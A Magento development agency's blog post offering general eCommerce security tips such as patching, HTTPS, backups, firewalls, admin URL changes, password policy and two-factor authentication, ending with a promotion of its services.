eCommerce, Magento

How to keep your eCommerce site secure

eCommerce Security

Image from

We live in a world where data breaches can occur at any time, with poor eCommerce security often resulting in the theft and dissemination of highly sensitive information such as customer passwords and credit card details.

When this happens, it not only puts the customer at risk but also the hard-earned reputation of the eCommerce store involved in the breach. In some cases, there can even be legal ramifications if investigations reveal that the breach was caused by an act of negligence, such as not being PCI Compliant.

In this article, we’ll take a close look at some of the more common risks to eCommerce website security on Magento powered sites, as well as the practical steps you can take to protect yourself from cybercrime.

Upgrade your software to the latest versions

Magento may be one of the most secure eCommerce platforms available, but if it’s not kept up to date, it can become vulnerable to attack.

One of the most common ways for hackers to gain access to a website is by taking advantage of well-known vulnerabilities. All the hacker needs to do is scan for these vulnerable sites using off the shelf hacking software. Once a target website is found, it’s just a matter of using the right exploit to break through its defences.

Another common security problem in eCommerce is something called Cross Site Scripting. This involves inserting malicious code into one of the pages on a website with the goal of infecting the computer of any visitor unlucky enough to be viewing it. This then gives the hacker access to the user’s files which can then be used to launch further attacks, such as Phishing exploits.

An SQL Injection can also be used to gain access to the database of the website, allowing the hacker to view, download and delete information such as user accounts, payment details and passwords. The hacker can even create an administrator account for themselves and take full control of the website.

This is why it’s vital to ensure that your eCommerce website is patched with the latest software, which can be downloaded directly from the Magento Security Centre. You can also run a free vulnerability scan from the same page to ensure that your eCommerce site is safe and secure.

Secure your eCommerce site with HTTPS

Websites that use HTTPS are able to communicate information securely using encryption. This makes them far more secure than their HTTP counterparts. As of July 2018, Google began marking HTTP sites as “Not Secure” to warn visitors that any information they share with the website would not be transmitted securely.

If your website has been marked as not secure (this should be visible in the address bar of your browser) then you will need to purchase an SSL certificate from a provider such as GoDaddy and ask your host to switch you to HTTPS. Alternatively, you can also use a FREE SSL certificate.

Protect your website against DDOS attacks

A DDOS or “distributed denial of service” attack is a method used by hackers to knock websites offline by flooding them with traffic. Usually, these attacks originate from large networks of computers or internet connected devices that are collectively referred to as a botnet. Typically, the owners of these devices have no idea that they are being used as part of an attack.

DDOS attacks can be difficult to combat due to each device in the botnet having its own unique IP address. And since many botnets are comprised of millions of infected machines, it would be impractical to attempt to block them all yourself.

The best defence against a DDOS attack is to choose a hosting company that has experience in dealing with them. So should the worst happen, you can be sure that you have an expert team working on getting your website back up and running again as quickly as possible.

Make regular backups

You should make daily backups of your eCommerce website, including any databases. These backups should also be stored away from your server, ideally in a cloud-based environment that only you know about. That way, if the worst happens and hackers destroy your site, you can rest easy knowing that your backups are safe.

If possible, you should automate your backup process using an extension such as Magento Cloud Backup or something similar. That way, you can be assured that a recent backup is always available even if you forget to make one yourself.

Speak to your host about installing a firewall

Most reliable and secure eCommerce hosting providers will have a robust firewall in place to block attempted hacks and mitigate the effect of DDOS attacks. You may also be able to have another firewall installed for your server which will add an additional layer of security and protection for your website.

Change the URL of your Magento backend

All Magento installations are the same out of the box, which means it’s relatively easy for hackers to figure out the URL to your administration backend. To make matters worse, the default administrator username for Magento is “Admin”, which means that the only missing information left for the hackers to guess is your password.

To get around this, you should follow a guide to changing your Magento admin URL. You should also change your admin username to something less obvious.

Improve your password policy

You should be using an extremely secure password for your administrator account that isn’t used for any other websites or services. Ideally, this password should be changed every six months and will contain a combination of uppercase, lowercase, numbers and special characters with a length of at least 6 characters. If you’re worried about forgetting this password, you can use a secure password vault such as LastPass to store it.

You should also ensure that your users are following a similar approach by pre-configuring their password requirements via the Magento backend. If you are unsure how to do this, you can follow this excellent guide to setting up customer passwords.

You can also take your eCommerce security to the next level by introducing two-factor authentication using security extensions such as the aptly named Two Factor Authentication from XTENTO or the equally imaginatively titled Two Factor Authentication extension from Amasty. Both extensions offer a wealth of eCommerce security features to help make your website more robust.

Block countries that you don’t deliver to

It may sound like a harsh generalisation, but one of the most common sources for malicious attacks is China. Thankfully, if you don’t ship products to China, you can just block all traffic at the country level using extensions such as IP Address and Country Blocker from FME extensions. This won’t prevent the more dedicated hackers from using a VPN to view your website, but it should block a great deal of unwanted traffic.

Remember to stay vigilant at all times

This article has covered many of the technical methods that hackers use to gain access to your website, but often even the smartest among us can still fall victim to relatively simple human hacking techniques such as social engineering exploits and CEO scams.

All of the above may sound like doom and gloom, but with the right knowledge, vigilance and common sense, you should be able to enjoy your time as an online seller without having to worry too much about hackers.

From everyone here at Form Commerce, we wish you all the best and hope you come back soon for more eCommerce tips.

Are you struggling with your website security?

Find out more about Form Commerce’s Magento development services.